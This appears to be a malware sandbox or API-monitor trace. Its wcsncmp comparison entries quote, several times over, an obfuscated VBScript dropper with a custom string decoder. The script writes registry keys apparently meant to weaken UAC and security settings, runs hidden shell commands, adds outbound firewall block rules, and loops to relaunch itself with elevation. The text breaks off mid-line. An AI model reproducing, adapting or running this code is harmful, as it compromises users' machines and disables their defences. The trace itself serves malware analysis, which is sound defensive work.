WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.349] wcsncmp (_String1=" false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.350] wcsncmp (_String1="false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0226.350] wcsncmp (_String1="alse\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.350] wcsncmp (_String1="lse\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute 